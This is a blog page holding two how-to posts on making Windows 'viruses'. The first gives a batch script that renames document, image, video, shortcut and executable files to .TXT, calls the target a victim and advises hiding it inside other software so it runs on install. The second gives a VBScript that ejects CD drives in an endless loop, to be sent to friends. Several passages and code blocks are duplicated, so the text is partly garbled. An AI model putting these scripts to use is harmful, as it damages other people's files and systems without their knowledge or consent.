Showing posts with label that. Show all posts
Showing posts with label that. Show all posts
Thursday, February 23, 2017
Make a virus that converts all files to non working TXT files
Make a virus that converts all files to non working TXT files
Hi friends,today I am going to share a simple trick to create a virus that can Change files to non-working TXT files.This is basically a batch virus that will change all the files extension to .TXT and it will be opened in notepad by default.Eventhough it is a simple virus it can effect your victims system adversely as it changes all files extension to .TXT and it is not all easy to restore orginal file extension as we have to manually do this and it is not at all practical.Anyway I will show you how to create this virus.All you have to need is a notepad to create this virus.Just follow my instructions as it is.HOW TO CREATE THIS VIRUS
1) Open notepad and copy the code given below exactly.
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
2) Now save the file with the extension .BAT,that is anyname.bat.
(Before saving make sure that it is having the above code only.There are chances that when you copy anything from this site,an automatic link to copied content is created.In that case delete such links and then save it )
3) Thats it,your batch virus is ready.Dont open this in your own system, As it will damage files in your system.
HOW TO ATTACH THIS VIRUS WITH ANY OTHER SOFTWARE
It is common that to make your virus more success you should attach it with any softwares.Then only you can make your victim to run your virus in background when they install the software in which you have already attached you virus.
(Before saving make sure that it is having the above code only.There are chances that when you copy anything from this site,an automatic link to copied content is created.In that case delete such links and then save it )
3) Thats it,your batch virus is ready.Dont open this in your own system, As it will damage files in your system.
HOW TO ATTACH THIS VIRUS WITH ANY OTHER SOFTWARE
It is common that to make your virus more success you should attach it with any softwares.Then only you can make your victim to run your virus in background when they install the software in which you have already attached you virus.
CLICK HERE TO KNOW HOW TO ATTACH VIRUS WITH ANY SOFTWARE
If you found this article useful please share your experience as comments.........
Available link for download
Thursday, December 22, 2016
Make a vrius that open and close your cd drive
Make a vrius that open and close your cd drive
This is a simple tutorial to make a virus that will open and close your cd drives contionously.Making this virus is so simple, all you have to need is a notepad.Just follow the steps exactly and make fun with your friends.Step 1
Open notepad and paste the below code exactly as it is
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
loop
End If
Step 2.
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
loop
End If
Step 2.
save the file with anyname having extension .vbs
eg: drive.vbs
Thats it you are done.When you open this you can see the magic.You can send this to your friends and have fun.If you want to attach this with any softwares,read my article how to attach files with softwares.
Note : To kill this process just open task manager and kill wscript.exe or just restart your system.
eg: drive.vbs
Thats it you are done.When you open this you can see the magic.You can send this to your friends and have fun.If you want to attach this with any softwares,read my article how to attach files with softwares.
Note : To kill this process just open task manager and kill wscript.exe or just restart your system.
Available link for download
Subscribe to:
Posts (Atom)